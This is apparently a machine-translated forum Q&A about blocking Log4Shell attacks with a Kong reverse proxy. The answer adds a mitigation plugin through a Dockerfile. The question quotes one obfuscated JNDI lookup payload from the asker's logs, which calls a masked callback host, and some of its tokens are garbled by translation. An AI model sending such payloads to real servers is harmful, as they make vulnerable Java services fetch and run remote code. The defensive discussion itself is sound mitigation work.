Reverse-Proxy
使用kong反向代理過濾log4j漏洞
我正在使用kong 反向代理來代理我的 Web 伺服器的每個 HTTP 請求。我想通過查找和替換關鍵攻擊者的字元串(如“jndi”)來緩解目前的 log4j 問題(“ log4shell ”)。例如,我發現這是我的日誌:
${jndi: $ {lower:l} $ {降低:d}a $ {lower:p}://xxx.log4j.bin $ {上:a}xxx.xx:80/回調}
我認為這可以通過使用請求轉換器外掛來完成。有人已經這樣做了嗎?
PS只是替換
jndi
為disabled
太深遠了,破壞了很多東西。
來自 kong 的人最近發了一篇博文來回答我的問題。他們開發了一個kong 外掛來緩解漏洞。
我通過更改我的 Dockerfile 將此外掛添加到我的 kong 中:
FROM kong:2.6 ... USER root ... # log4shell mitigation # see https://konghq.com/blog/log4j-log4shell/ RUN git clone https://github.com/brentos/kong-plugin-log4shell && \ cd kong-plugin-log4shell && \ luarocks make ... ENV KONG_PLUGINS ...,log4shell ... USER kong
然後我只是將此 log4shell 添加為全域外掛。